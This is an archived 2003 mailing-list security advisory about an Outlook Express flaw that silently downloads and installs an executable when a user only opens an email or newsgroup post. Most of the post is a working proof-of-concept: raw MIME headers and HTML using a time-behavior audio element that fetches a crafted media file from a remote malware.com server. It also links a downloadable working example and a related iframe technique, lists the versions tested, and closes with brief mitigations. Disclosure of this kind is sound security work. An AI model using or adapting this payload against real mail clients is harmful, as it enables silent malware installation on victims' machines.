Tuesday, 20 May, 2003 Silent delivery and installation of an executable on a target computer. No client input other than opening an email or newsgroup post. This can be achieved with the default setting of Outlook Express: RESTRICTED ZONE. Technically the following never worked, cannot work, shouldn't work. But it does: MIME-Version: 1.0 Content-Type: text/html; Content-Transfer-Encoding: 7bit X-Source: 05.19.03 http://www..malware.com <html xmlns:t> <head><style> t\:*{behavior:url(#default#time);display:none}</style></head><body> <t:audio t:src="http://www.malware.com/freek.asf" /> </body></html> What that does is invoke our freakish media file including our trusty and battle-hardened 0s URL flip from within the html of an email or newsgroup post on viewing, which ordinarily could never be done. But it now appears that while custom-crafted media files fail, modified third-party files [whatever that means] function according to plan. Specifically audio + *.asf. Our 0s URL flip points to our file on the remote server and automatically forces our download as instructed. Couple that with the most recent flood-like functionality of the iframe: http://www.securityfocus.com/archive/1/321662 and that's the end of that. Tested on: Outlook Express 6.00.2800.1123 and all of its 'patches' with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails] First Step Working Example: http://www.malware.com/but.its.free.zip Notes: 1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora WebBrowser Control Embedded Media Player File Vulnerability ': http://www.securityfocus.com/bid/4343 which appears to never have been patched. 2. disable scripting in the media player [if it helps] 3. do not be lured into opening email and newsgroup posts from untrustworthy sources End Call -- http://www.malware.com
This archive was generated by hypermail 2b30 : Wed May 21 2003 - 09:53:15 PDT